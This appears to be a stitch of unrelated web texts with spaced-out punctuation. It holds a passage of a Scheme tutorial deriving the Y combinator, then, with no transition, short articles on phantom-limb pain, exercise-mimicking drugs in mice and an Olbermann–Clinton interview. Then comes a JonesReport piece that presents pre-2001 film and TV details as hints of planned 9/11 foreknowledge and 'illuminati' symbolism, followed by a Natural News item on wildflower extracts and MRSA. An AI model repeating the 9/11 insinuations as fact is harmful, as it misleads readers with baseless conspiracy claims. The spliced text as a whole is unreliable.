( define factorial0 ( almost - factorial identity ) ) ( define factorial1 ( almost - factorial ( almost - factorial identity ) ) ) ( define factorial2 ( almost - factorial ( almost - factorial ( almost - factorial identity ) ) ) ) ( define factorial3 ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial identity ) ) ) ) ) ( define factorial4 ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial identity ) ) ) ) ) ) ( define factorial5 ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial identity ) ) ) ) ) ) )
and so on .
Again , if you 're very clever you might wonder if you could do this :
( define factorial - infinity ( almost - factorial ( almost - factorial ( almost - factorial ... ) ) ) )
where the ... means that you 're repeating the chain of almost - factorials an infinite number of times .
If you did wonder this , go to the head of the class !
Unfortunately , we can't write this out directly , but we can define the equivalent of this .
Note also that factorial - infinity is just the factorial function we want : it works on all integers greater than or equal to zero .
What we have shown is that if we could define an infinite chain of almost - factorials , that would give us the factorial function .
Another way of saying this is that the factorial function is the fixpoint of almost - factorial , which is what I will explain next .
Fixpoints of functions
The notion of a fixpoint should be familiar to anyone who has amused themselves playing with a pocket calculator .
You start with 0 and hit the cos ( cosine ) key repeatedly .
What you find is that the answer rapidly converges to a number which is ( approximately ) 0.73908513321516067 ; hitting the cos key again does n't change anything because cos( 0.73908513321516067 ) = 0.73908513321516067 .
We say that the number 0.73908513321516067 is a fixpoint of the cosine function .
The cosine function takes a single input value ( a real number ) and produces a single output value ( also a real number ) .
The fact that the input and output of the function are the same type is what allows you to apply it repeatedly , so that if x is a real number , we can calculate what cos(x ) is , and since that will also be a real number , we can calculate what cos( cos ( x ) ) is , and then what cos( cos ( cos ( x ) ) ) is , and so on .
The fixpoint is the value x where cos(x ) = x .
Fixpoints do n't have to be real numbers .
In fact , they can be any type of thing , as long as the function that generates them can take the same type of thing as input as it produces as output .
Most importantly for our discussion , fixpoints can be functions .
If you have a higher - order function like almost - factorial that takes in a function as its input and produces a function as its output ( with both input and output functions taking a single integer argument as input and producing a single integer as output ) , then it should be possible to compute its fixpoint ( which will , naturally , be a function which takes a single integer argument as input and produces a single integer as output ) .
That fixpoint function will be the function for which
fixpoint - function = ( almost - factorial fixpoint - function )
By repeatedly substituting the right - hand side of that equation into the fixpoint - function on the right , we get :
fixpoint - function = ( almost - factorial ( almost - factorial fixpoint - function ) ) = ( almost - factorial ( almost - factorial ( almost - factorial fixpoint - function ) ) ) = ... = ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial ... ) ) ) ) )
As we saw above , this will be the factorial function we want .
Thus , the fixpoint of almost - factorial will be the factorial function :
factorial = ( almost - factorial factorial ) = ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial ( almost - factorial ... ) ) ) ) )
That 's all well and good , but just knowing that factorial is the fixpoint of almost - factorial does n't tell us how to compute it .
Would n't it be nice if there was some magical higher - order function that would take as its input a function like almost - factorial , and would output its fixpoint function , which in that case would be factorial ?
Would n't that be really freakin ' sweet ?
That function exists , and it's the Y combinator .
Y is also known as the fixpoint combinator : it takes in a function and returns its fixpoint .
Eliminating ( most ) explicit recursion ( lazy version )
OK , it 's time to derive Y .
Let 's start by specifying what Y does :
( Y f ) = fixpoint - of - f
What do we know about the fixpoint of f ?
We know that
( f fixpoint - of - f ) = fixpoint - of - f
by the definition of what a fixpoint of a function is .
Therefore , we have :
( Y f ) = fixpoint - of - f = ( f fixpoint - of - f )
and we can substitute ( Y f ) for fixpoint - of - f to get :
( Y f ) = ( f ( Y f ) )
Voila !
We 've just defined Y .
If we want it to be expressed as a Scheme function , we would have to write it like this :
( define ( Y f ) ( f ( Y f ) ) )
or , using an explicit lambda expression , as :
( define Y ( lambda ( f ) ( f ( Y f ) ) ) )
However , there are two caveats regarding this definition of Y :
It will only work in a lazy language ( see below ) .
It is not a combinator , because the Y in the body of the definition is a free variable which is only bound once the definition is complete .
In other words , we could n't just take the body of this version of Y and plop it in wherever we needed it , because it requires that the name Y be defined somewhere .
Nevertheless , if you 're using lazy Scheme , you can indeed define factorials like this :
( define Y ( lambda ( f ) ( f ( Y f ) ) ) ) ( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define factorial ( Y almost - factorial ) )
and it will work correctly .
What have we accomplished ?
We originally wanted to be able to define the factorial function without using any explicitly recursive functions at all .
We 've almost done that .
Our definition of Y is still explicitly recursive .
However , we 've taken a giant step , because this is the only function in our language that needs to be explicitly recursive in order to define recursive functions .
With this version of Y we can go ahead and define other recursive functions ( for instance , defining fibonacci as ( Y almost - fibonacci ) ) .
Eliminating ( most ) explicit recursion ( strict version )
I said above that the definition of Y that we derived would n't work in a strict language ( like standard Scheme ) .
In a strict language , we evaluate all the arguments to a function call before applying the function to its arguments , whether or not those arguments are needed .
So if we have a function f and we try to evaluate ( Y f ) using the above definition , we get :
( Y f ) = ( f ( Y f ) ) = ( f ( f ( Y f ) ) ) = ( f ( f ( f ( Y f ) ) ) ) etc .
and so on ad infinitum .
The evaluation of ( Y f ) will never terminate , so we will never get a usable function out of it .
This definition of Y does n't work for strict languages .
However , there is a clever hack that we can use to save the day and define a version of Y that works in strict languages .
The trick is to realize that ( Y f ) is going to become a function of one argument .
Therefore , this equality will hold :
( Y f ) = ( lambda ( x ) ( ( Y f ) x ) )
Whatever one - argument function ( Y f ) is , ( lambda ( x ) ( ( Y f ) x ) ) has to be the same function .
All you 're doing is taking in a single input value x and giving it to the function defined by ( Y f ) .
In a similar way , this will be true :
cos = ( lambda ( x ) ( cos x ) )
It does n't matter whether you use cos or ( lambda ( x ) ( cos x ) ) as your cosine function ; they will both do the same thing .
However , it turns out that ( lambda ( x ) ( ( Y f ) x ) ) has a big advantage when defining Y in a strict language .
By the reasoning given above , we should be able to define Y as follows :
( define Y ( lambda ( f ) ( f ( lambda ( x ) ( ( Y f ) x ) ) ) ) )
Since we know that ( lambda ( x ) ( ( Y f ) x ) ) is the same function as ( Y f ) , this is a valid version of Y which will work just as well as the previous version , even though it 's a bit more complicated ( and perhaps a tiny bit slower in practice ) .
We could use this version of Y to define the factorial function in lazy Scheme , and it would work fine .
The cool thing about this version of Y is that it will also work in a strict language ( like standard Scheme ) !
The reason for this is that when you give Y a particular f to find the fixpoint of , it will return
( Y f ) = ( f ( lambda ( x ) ( ( Y f ) x ) ) )
This time , there is no infinite loop , because the inner ( Y f ) is kept inside a lambda expression , where it sits until it 's needed ( since the body of a lambda expression is never evaluated in Scheme until the lambda expression is applied to its arguments ) .
Basically , you 're using the lambda to delay the evaluation of ( Y f ) .
So if f was almost - factorial , we would have this :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define factorial ( Y almost - factorial ) )
Expanding out the call to Y , we have :
( define factorial ( ( lambda ( f ) ( f ( lambda ( x ) ( ( Y f ) x ) ) ) ) almost - factorial ) ) ==> ( define factorial ( almost - factorial ( lambda ( x ) ( ( Y almost - factorial ) x ) ) ) ) ==> ( define factorial ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( ( lambda ( x ) ( ( Y almost - factorial ) x ) ) (- n 1 ) ) ) ) ) )
Here again , ( lambda ( x ) ( ( Y almost - factorial ) x ) ) is the same function as ( Y almost - factorial ) , which is the fixpoint of almost - factorial , which is just the factorial function .
However , the ( Y almost - factorial ) in ( lambda ( x ) ( ( Y almost - factorial ) x ) ) wo n't be evaluated until the entire lambda expression is applied to its argument , which wo n't happen until later ( or not at all , for the factorial of zero ) .
Therefore this factorial function will work in a strict language , and the version of Y used to define it will also work in a strict language .
I realize that the preceding discussion and derivation is nontrivial , so do n't be discouraged if you do n't get it right away .
Just sleep on it , play with it in your mind and with your trusty DrScheme interpreter , and you 'll eventually get it .
At this point , we 've accomplished everything we 've set out to accomplish , except for one tiny little detail : we have n't yet derived the Y combinator itself .
Deriving the Y combinator
The lazy ( normal - order ) Y combinator
At this point , we want to define not just Y , but a Y combinator .
Note that the previous ( lazy ) definition of Y :
( define Y ( lambda ( f ) ( f ( Y f ) ) ) )
is a valid definition of Y but is not a Y combinator , since the definition of Y refers to Y itself .
In other words , this definition is explicitly recursive .
A combinator is n't allowed to be explicitly recursive ; it has to be a lambda expression with no free variables ( as I mentioned above ) , which means that it can't refer to its own name ( if it even has a name ) in its definition .
If it did , the name would be a free variable in the definition , as we have in our definition of Y :
( lambda ( f ) ( f ( Y f ) ) )
Note that Y in this definition is free ; it is n't the bound variable of any lambda expression .
So this is not a combinator .
Another way to think about this is that you should be able to replace the name of a combinator with its definition everywhere it 's found and have everything still work .
( Can you see why this would n't work with the explicitly recursive definition of Y ?
You would get into an infinite loop and you 'd never be able to replace all the Ys with their definitions . )
So whatever the Y combinator will be , it will not be explicitly recursive .
From this non-recursive function we will be able to define whatever recursive functions we want .
I 'm going to go back a bit to our original problem and derive a Y combinator from the bottom up .
After I 've done that I 'll check to make sure that it is a fixpoint combinator , like the versions of Y we 've already seen .
In what follows I will borrow ( steal ) liberally from a very elegant derivation of the Y combinator sent to me by Eli Barzilay ( thanks , Eli ! ) , who is one of the DrScheme developers and an all - around Scheme uberstud .
Recall our original recursive factorial function :
( define ( factorial n ) ( if ( = n 0 ) 1 (* n ( factorial (- n 1 ) ) ) ) )
Recall that we want to define a version of this without the explicit recursion .
One way we could do this is to pass the factorial function itself as an extra argument when you call the function :
;;
This wo n't work yet : ( define ( part - factorial self n ) ( if ( = n 0 ) 1 (* n ( self (- n 1 ) ) ) ) )
Note that part - factorial is not the same as the almost - factorial function described above .
We would have to call this part - factorial function in a different way to get it to compute factorials :
( part - factorial part - factorial 5 ) ==> 120
This is not explicitly recursive because we send along an extra copy of the part - factorial function as the self argument .
However , it wo n't work unless the point of recursion calls the function the exact same way :
( define ( part - factorial self n ) ( if ( = n 0 ) 1 (* n ( self self (- n 1 ) ) ) ) ) ;; note the extra " self " here ( part - factorial part - factorial 5 ) ==> 120
This works , but now we have moved away from our original way of calling the factorial function .
We can move back to something closer to our original version by rewriting it like this :
( define ( part - factorial self ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( ( self self ) (- n 1 ) ) ) ) ) ) ( ( part - factorial part - factorial ) 5 ) ==> 120 ( define factorial ( part - factorial part - factorial ) ) ( factorial 5 ) ==> 120
Pause for a second here .
Notice that we 've already defined a version of the factorial function without using explicit recursion anywhere !
This is the most crucial step .
Everything else we do will be concerned with packaging what we 've already done so that we can easily re-use it with other functions .
Now let 's try to get back something like our almost - factorial function by pulling out the ( self self ) call using a let expression outside of a lambda :
( define ( part - factorial self ) ( let ( (f ( self self ) ) ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define factorial ( part - factorial part - factorial ) ) ( factorial 5 ) ==> 120
This will work fine in a lazy language .
In a strict language , the ( self self ) call in the let statement will send us into an infinite loop , because in order to calculate ( part - factorial part - factorial ) ( in the definition of factorial ) you will first have to calculate ( part - factorial part - factorial ) ( in the let expression ) .
( For fun : figure out why this was n't a problem with the previous definition . )
I 'll let this go for now , because I want to define the lazy Y combinator , but in the next section I 'll solve this problem in the same way we solved it before ( by wrapping a lambda around the ( self self ) call ) .
Note that in a lazy language , the ( self self ) call in the let statement will never be evaluated unless f is actually needed ( for instance , if n = 0 then f is n't needed to compute the answer , so ( self self ) wo n't be evaluated ) .
Understanding how lazy languages evaluate expressions is not trivial , so do n't worry if you find this a little confusing .
I recommend you experiment with the code using the lazy Scheme language level of DrScheme to get a better feel for what 's going on .
It turns out that any let expression can be converted into an equivalent lambda expression using this equation :
( let ( ( x < expr1 > ) ) < expr2 > ) == > ( ( lambda ( x ) < expr2 > ) < expr1 > )
where < expr1 > and < expr2 > are arbitrary Scheme expressions .
( I 'm only considering let expressions with a single binding and lambda expressions with a single argument , but the principle can easily be generalized to lets with multiple bindings and lambdas with multiple arguments . )
This leads us to :
( define ( part - factorial self ) ( ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ( self self ) ) ) ( define factorial ( part - factorial part - factorial ) ) ( factorial 5 ) ==> 120
If you look closely , you 'll see that we have our old friend the almost - factorial function embedded inside the part - factorial function .
Let 's pull it outside :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define ( part - factorial self ) ( almost - factorial ( self self ) ) ) ( define factorial ( part - factorial part - factorial ) ) ( factorial 5 ) ==> 120
I do n't know about you , but I 'm getting pretty fed up with this whole ( part - factorial part - factorial ) thing , and I 'm not going to take it anymore !
Fortunately , I do n't have to ; I can first rewrite the part - factorial function like this :
( define part - factorial ( lambda ( self ) ( almost - factorial ( self self ) ) ) )
Then I can rewrite the factorial function like this :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define factorial ( let ( ( part - factorial ( lambda ( self ) ( almost - factorial ( self self ) ) ) ) ) ( part - factorial part - factorial ) ) ) ( factorial 5 ) ==> 120
The factorial function can be written a little more concisely by changing the name of part - factorial to x ( since we are n't using this name anywhere else now ) :
( define factorial ( let ( (x ( lambda ( self ) ( almost - factorial ( self self ) ) ) ) ) ( x x ) ) )
Now let 's use the same let == > lambda trick we used above to get :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define factorial ( ( lambda ( x ) ( x x ) ) ( lambda ( self ) ( almost - factorial ( self self ) ) ) ) ) ( factorial 5 ) ==> 120
And again , to make this definition a little more concise , we can rename self to x to get :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define factorial ( ( lambda ( x ) ( x x ) ) ( lambda ( x ) ( almost - factorial ( x x ) ) ) ) ) ( factorial 5 ) ==> 120
Note that the two lambda expressions in the definition of factorial both are functions of x , but the two x 's do n't conflict with each other .
In fact , we could have renamed self to y or almost any other name , but it 'll be convenient to use x in what follows .
We 're almost there !
This works fine , but it's too specific to the factorial function .
Let 's change it to a generic make - recursive function that makes recursive functions from non-recursive ones ( sound familiar ? ) :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define ( make - recursive f ) ( ( lambda ( x ) ( x x ) ) ( lambda ( x ) ( f ( x x ) ) ) ) ) ( define factorial ( make - recursive almost - factorial ) ) ( factorial 5 ) ==> 120
The make - recursive function is in fact the long - sought lazy Y combinator , also known as the normal - order Y combinator , so let 's write it that way :
( define almost - factorial ( lambda ( f ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define ( Y f ) ( ( lambda ( x ) ( x x ) ) ( lambda ( x ) ( f ( x x ) ) ) ) ) ( define factorial ( Y almost - factorial ) )
I 'm going to expand out the definition of Y a little bit :
( define Y ( lambda ( f ) ( ( lambda ( x ) ( x x ) ) ( lambda ( x ) ( f ( x x ) ) ) ) ) )
Note that we can apply the inner lambda expression to its argument to get an equivalent version of Y :
( define Y ( lambda ( f ) ( ( lambda ( x ) ( f ( x x ) ) ) ( lambda ( x ) ( f ( x x ) ) ) ) ) )
What this means is that , for a given function f ( which is a non-recursive function like almost - factorial ) , the corresponding recursive function can be obtained first by computing ( lambda ( x ) ( f ( x x ) ) ) , and then applying this lambda expression to itself .
This is the usual definition of the normal - order Y combinator .
The only thing left to do is to check that this Y combinator is a fixpoint combinator ( which it has to be in order to compute the right thing ) .
To do this we have to demonstrate that this equation is correct :
( Y f ) = ( f ( Y f ) )
From the definition of the normal - order Y combinator given above , we have :
( Y f ) = ( ( lambda ( x ) ( f ( x x ) ) ) ( lambda ( x ) ( f ( x x ) ) ) )
Now apply the first lambda expression to its argument , which is the second lambda expression , to get this :
= ( f ( ( lambda ( x ) ( f ( x x ) ) ) ( lambda ( x ) ( f ( x x ) ) ) ) ) = ( f ( Y f ) )
as desired .
So , not only is the normal - order Y combinator also a fixpoint combinator , it 's just about the most obvious fixpoint combinator there is , in that the proof that it 's a fixpoint combinator is so trivial .
If you 've made it through all of this derivation , you should pat yourself on the back and take a well - deserved break .
When you come back , we 'll finish off by deriving ...
The strict ( applicative - order ) Y combinator
Let 's pick up the previous derivation just before the point where it failed for strict languages :
( define ( part - factorial self ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( ( self self ) (- n 1 ) ) ) ) ) ) ( ( part - factorial part - factorial ) 5 ) ==> 120 ( define factorial ( part - factorial part - factorial ) ) ( factorial 5 ) ==> 120
Up to this point , everything works in a strict language .
Now if we pull the ( self self ) out into a let expression as before , we have :
( define ( part - factorial self ) ( let ( (f ( self self ) ) ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) ) ( define factorial ( part - factorial part - factorial ) ) ( factorial 5 ) ==> 120
As I said above , this will not work in a strict language , because whenever the factorial function is called it will evaluate the function call ( part - factorial part - factorial ) , and when that function call is evaluated it will first evaluate ( self self ) as part of the let expression , which in this case will be ( part - factorial part - factorial ) , leading to an infinite loop of ( part - factorial part - factorial ) calls .
We saw above that the way around problems like this is to realize that what we are trying to evaluate are functions of one argument .
In this case , ( self self ) will be a function of one argument ( it 's going to be the same as ( part - factorial part - factorial ) , which is just the factorial function ) .
We can wrap a lambda expression around this function to get an equivalent function :
( define ( part - factorial self ) ( let ( (f ( lambda ( y ) ( ( self self ) y ) ) ) ) ( lambda ( n ) ( if ( = n 0 ) 1 (* n ( f (- n 1 ) ) ) ) ) ) )
All we 've done here is convert ( self self ) , a function of one argument , to ( lambda ( y ) ( ( self self ) y ) ) , an equivalent function of one argument ( we saw this trick earlier ) .
I 'm using y instead of x as the variable binding of the new lambda expression so as not to cause name conflicts later on in the derivation when self gets renamed to x , but I could have chosen another name as well .
After we 've done this , the part - factorial function will now work even in a strict language .
That 's because once ( part - factorial part - factorial ) is evaluated , as part of evaluating the let expression the code ( lambda ( x ) ( ( self self ) x ) ) will be evaluated .
Unlike before , this will not send us into an infinite loop ; the lambda expression wo n't be evaluated further until it 's applied to its argument .
This lambda wrapper does n't change the value of the thing it wraps , but it does delay its evaluation , which is all we need to get the definition of part - factorial to work in a strict language .
And that 's the trick .
After that , we carry through every other step of the derivation in exactly the same way .
We end up with this definition of the strict Y combinator :
( define Y ( lambda ( f ) ( ( lambda ( x ) ( f ( lambda ( y ) ( ( x x ) y ) ) ) ) ( lambda ( x ) ( f ( lambda ( y ) ( ( x x ) y ) ) ) ) ) ) )
This can also be written in the equivalent form :
( define Y ( lambda ( f ) ( ( lambda ( x ) ( x x ) ) ( lambda ( x ) ( f ( lambda ( y ) ( ( x x ) y ) ) ) ) ) ) )
Hopefully , you can see why this is equivalent .
Either of these are the strict Y combinator , or as it's called in the technical literature , the applicative - order Y combinator .
In a strict language ( like standard Scheme ) you can use this to define the factorial function in the usual way :
( define factorial ( Y almost - factorial ) )
I recommend you try this out with DrScheme , and lo ! marvel at the awesome power of the applicative - order Y combinator , that which hath created recursion where no recursion hath previously existed .
Other matters
Practical applications
This article has ( I hope ) convinced you that you do n't need to have explicit recursion built in to a language in order for that language to allow you to define recursive functions , as long as the language supports first - class functions so that you can define a Y combinator .
However , I do n't want to leave you with the notion that recursion in real computer languages is implemented this way .
In practice , it 's far more efficient to just implement recursion directly in a computer language than to use the Y combinator .
There are lots of other interesting issues that come up when considering how to implement recursion efficiently , but those issues are beyond the scope of this article .
The point is that implementing recursion using the Y combinator is mainly of theoretical interest .
That said , in the paper Y in Practical Programs , Bruce McAdams discusses a few ways in which Y can be used to define variants of recursive functions that e.g. print traces of their execution or automatically memoize their execution to give greater efficiency ( as well as a few more esoteric applications ) , so Y is n't just a theoretical construct .
Mutual Recursion
Experienced functional programmers and / or particularly astute readers may have noticed that I did n't describe how to use the Y combinator to implement mutual recursion , which is where you have two or more functions which all call each other .
The simplest example I can think of to illustrate mutual recursion are the following pair of functions which determine whether a non-negative integer is even or odd :
( define ( even ? n ) ( if ( = n 0 ) #t ( odd ? (- n 1 ) ) ) ) ( define ( odd ? n ) ( if ( = n 0 ) #f ( even ? (- n 1 ) ) ) )
Before you start yelling at me , yes , I know that this is n't the most efficient way to compute evenness or oddness — it 's just to illustrate what mutual recursion is .
Any computer language that supports recursive function definitions has to support mutual recursion as well , but I have n't shown you how to use Y to define mutually - recursive functions .
I 'm going to cop out here because I think this article is long enough as it is , but rest assured that it is possible to define analogs of Y that can define mutually - recursive functions .
Further reading
The Wikipedia article on the Y combinator is somewhat difficult reading , but it has some interesting material I did n't cover here .
The Little Schemer , 4th .
ed. , by Dan Friedman and Matthias Felleisen .
Chapter 9 has a derivation of the Y combinator which is what got me interested in this subject .
The article Y in Practical Programs , by Bruce McAdams , which was referred to in the previous section .
Acknowledgments
I would like to thank the following people :
Neurology journal Brain has just published an elegant open - access study on how just six weeks of mental imagery training can help reduce phantom limb pain as well as reorganising the sensory and motor maps in the brain .
Phantom limbs are when amputees feel sensations that seem to be coming from the missing limb .
Sometimes this can include pain which can either be constant or transitory .
Sensations from the nonexistent limb are thought to be due to the brain reorganising the areas which represent the body .
In the case of a phantom arm , for example , the area is no longer receiving sensations from the limb and so stops being so carefully defined .
Areas serving other body areas ( like the face ) start to creep in and facial stimulation can be felt in the missing arm due to the fuzzy neurological boundaries .
This new study , led by neuroscientist Kate McIver , decided to test whether mental imagery can help keep these areas active and prevent the fuzziness creeping in , potentially reducing the phantom pain .
This is based on extensive research to show that imagining something activates similar brain areas to actually perceiving the sensation or executing the action .
For example , imagining the sensation of a cool breeze across your arm actually increases activity in the brain areas responsible for arm sensations , while imaging picking something up activates arm - related motor areas .
The research team asked participants to rate their phantom limb pain and used fMRI to look at which brain areas were most active during some movement - related tasks .
While in the scanner , the participants were asked to imagine actions with either the existing or phantom hand , to move the existing hand or were asked to purse ( push together ) their lips .
This last action tends to activate what was previously the hand area in the brain in people with phantom limbs , but does n’t in people with intact limbs .
Indeed , this is exactly what the initial brain scans reported , indicating that their brains had reorganised sensory boundaries .
The researchers then invited each participant for six weekly sessions that involved a mental ‘ body scan ’ technique that involved imagining free and comfortable movement in their phantom limb such as they could “ stretch away the pain ” and “ allow the fingers , hand and arm to rest in a comfortable position ” .
Participants also practised in their own time .
After six weeks , pain ratings were taken again and the brain scanning was re-run .
The painful sensations had significantly reduced and lip pursing no longer activated the hand area .
The mental imagery seemed to have ‘ simulated ’ arm actions and sensations well enough so that the neurological boundaries remained sharp and cross - area fuzziness did n’t encourage phantom pain .
Link to full text article in Brain .
Link to PubMed entry .
It sounds too good to be true .
Cash in that gym membership .
Pack away those running shoes .
Scientists are testing drugs that they claim will produce the benefits of exercise in muscles without the hard work .
The researchers have shown that four weeks after administering one drug to mice , the animals were able to run 44 % farther than untreated mice , despite not exercising .
The finding raises the possibility of treatments for muscle - wasting conditions in humans , but also recreational " gym pills " that confer a performance gain without the pain .
Couch potatoes should not get too comfortable though .
Despite nearly a decade of scientific research on stimulating muscle endurance in rodents , efforts to achieve the same results in humans have so far ended in failure .
" There 's been very little success , " said Prof Paul Greenhaff , an expert in muscle metabolism at the University of Nottingham .
" It 's not really having the large impact that you would expect to see from the animal work . "
The US research team used two drugs to stimulate different elements of muscle metabolism involved in endurance .
In one experiment they used an experimental drug to stimulate PPAR delta , a gene involved in muscle metabolism .
On its own this did not improve the animals ' exercise performance , but when the scientists combined it with an exercise regimen that involved a daily 50 - minute run on a treadmill they saw a 77 % improvement in endurance compared with mice that had the same exercise regimen , but were not given the drug .
The combination of drug and exercise increased the proportion of " slow twitch " muscle fibres by 38 % .
These are the fibres involved in endurance rather than strength .
In a separate study , the team used a compound called AICAR to stimulate another gene involved in muscle metabolism , AMPK .
After four weeks without exercise , the mice were able to run 23 % longer and 44 % farther than untreated mice .
" That 's as much improvement as we get with regular exercise , " said Dr Vihang Narkar at the Salk Institute in La Jolla , California .
The results are reported in the journal Cell .
Narkar said the team hoped to replicate the results in people .
" The ability of these drugs to improve muscle performance can be potentially exploited in treating muscle - wasting or weakening diseases , " he said .
But he added that boosting endurance would also be attractive to athletes such as marathon runners who wanted to cheat their way to success .
" We have developed tests ( early stage ) to measure the levels of these compounds in blood and urine .
These tests are being developed in collaboration with the World Anti-Doping Agency [ the body that polices doping in sport ] in response to concerns regarding doping , " he said .
However , Greenhaff said that worrying about abuse by athletes was premature because despite nearly a decade of research the same effects on performance have not been replicated in people .
" It is just taking it way out of the realms of reality ...
The observations themselves are very interesting – do n't get me wrong .
But in the context it is being spun , ie human athletics and mimicking exercise , it is really a million miles away , " he said .
" There are AICAR human studies ... and you do n't see these effects .
If it 's that hot , where are the human data ? "
Prof David Cowan , director of the Drug Control Centre at King 's College London , whose laboratory is accredited by the World Anti-Doping Agency , said WADA was keeping an eye on the research .
But he added : " It is a big step from mouse to man . "
Keith Olbermann has been tough on Senator Hillary Clinton during the Democratic presidential primary , but on the eve of the Pennsylvania primary , she appeared on Countdown to talk about the campaign , her policies and some of the back and forth with Senator Barack Obama .
Olbermann gave Clinton ample time to make her points -- which she used to her advantage -- and asked her a few tough questions , but no follow ups , by his own admission later in the show .
Download Download
Olbermann asks Clinton about her response to Barack Obama 's comment that all three candidates are better than George Bush , and about her presidential threshold comment .
Hillary chose to focus more on Senator McCain , saying his views on issues like Iraq and the economy would actually make him worse than Bush :
" ... The problem is that he has the wrong ideas .
He would continue the Bush policies on Iraq , which I think is wrong for the country .
And , in fact , his statement about his being willing to leave troops in Iraq for up to 100 years is something I absolutely reject .
That would be worse than President Bush . "
UPDATE : ( Nicole ) Although Olbermann acknowledged that the limited time frame from which he was working hampered his ability to ask follow up questions , the fact that he allowed Clinton without pause to continue with her aggressive statements against Iran based on false allegations of a restarted nuclear weapons program ( which he also mentioned after the interview was contradicted by the intelligence ) is really unacceptable , especially after giving George Stephanopoulos and Charles Gibson a hard time for their debate moderation .
According to The Politico ( I know , I know ) :
JonesReport.com | August 18 , 2008
Insiders love bragging to one another about being on the inside– perhaps that ’s one explanation for an abundance of illuminati symbolism in mainstream media and corporate logos .
Among the interesting references to 9/11 that have been uncovered in media released before 9/11 is a passport for ‘ Neo ’ in blockbuster film The Matrix , released in 1999 .
The passport– in Neo ’s file– shows an expiration date of ’ 11 SEP 01 , ’ seemingly now an eerie coincidence found in the smallest of details .
CLICK HERE TO SEE FULL SIZED FRAME
Further , the 10 - year passport shows an issue date of ’ 12 SEP 91 ′– only one day after George H.W. Bush ’s haunting September 11 , 1991 speech before Congress where he called for , in no uncertain terms , a New World Order ( and before that on Sept. 11 , 1990 ) .
Indeed , September 11 proves to be an important occultic date / number to the elites .
Coincidence or not , the Wachowski brothers , the film ’s directors , have proven to be obviously knowledgeable about a number of esoteric meanings – not only do both The Matrix trilogy and V for Vendetta contain plotlines laden with occult symbolism , but its imagery is also textured throughout these films .
The Simpsons , " The City of New York vs. Homer Simpson " Orig. airdate September 21 , 1997 [ wiki ]
Such pre-9/11 coincidences are prevalent elsewhere in the media as well .
For instance , a 1997 episode of the Simpsons shows Lisa holding an ad for a $ 9 bus trip to New York with the towers interestingly juxtaposed next to the 9 , portraying the image of 9/11 .
The pilot episode for ‘ The Lone Gunmen ‘ ( an X - Files spin off ) featured an extremely eerie plot where a government faction posing as terrorists hijack a 727 by remote control and attempt to fly it into the World Trade Center– the episode aired on March 4 , 2001 – some 6 months before the 9/11 attacks .
From the pilot for ‘ The Lone Gunmen ’ – Orig. airdate March 4 , 2001
The series ’ star , Dean Haglund , has previously appeared on the Alex Jones Show to discuss the odd coincidence .
" Part of the plot , as it said in the script was that this event would be used to start an international war on terror . "
Haglund commented .
Interestingly , Haglund also revealed that representatives of the FBI and NASA would frequently approach X - Files series creator Chris Carter with plots for stories and noted also that CIA and other government officials frequented Hollywood parties to plant script ideas .
It is well - known that the Pentagon has a heavy influence in most big budget military films – trading access to bases , planes and other equipment for heavily influence and control of the message in scripts – and it is clear that such government forces meddle in other areas of media as well .
Obscure 9/11 references before the fact :
File it under ‘ things that make you go hmmm ’ because it certainly was n’t bin Laden who put those references there .
9/11 Chronicles Part One : Truth Rising
Get the DVD and make copies or watch the high quality streaming and download version online at Prison Planet.tv .
Click here to read more about the film and view sample trailers .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
( Natural News ) Extracts from two Eurasian wildflowers are highly effective at killing the superbug methicillin - resistant Staphylococcus aureus ( MRSA ) , according to a study conducted by researchers at the Cork Institute of Technology ( CIT ) in Ireland .
Researchers found that extracts from Inula helenium ( commonly known as elecampane , horse - heal or marchalan ) eliminated 100 percent of MRSA colonies upon exposure .
I. helenium and another wildflower , known as Pulsatilla vulgaris or pasque flower , were tested against 300 different varieties of staphylococci bacteria , including MRSA .
P. vulgaris also proved " highly effective " against MRSA , according to an article in the " Irish Examiner .
" MRSA is resistant to all first - line antibiotics , making it more likely that staph infections caused by the bug will proceed for longer without treatment and spread from the skin to other parts of the body .
This makes MRSA correspondingly more lethal than other staph infections .
The increasing prevalence and lethality of MRSA in hospitals , schools , prisons and other institutional settings across the United States has made the superbug an issue of increasing concern for health officials .
A recent study published in thefound that MRSA infected nearly 100,000 people in the United States in 2005 and killed 18,650 people .
Roughly 16,000 people died from AIDS in the same year .
I. helenium is a bright yellow , tall perennial wildflower that grows throughout central and southern Europe and throughout western and central Asia as far east as the Himalayas .
It blossoms in the late summer .
P. vulgaris , a member of the buttercup family , produces bell - shaped flowers in early spring .
The wildflower is found throughout western , central and southern Europe .
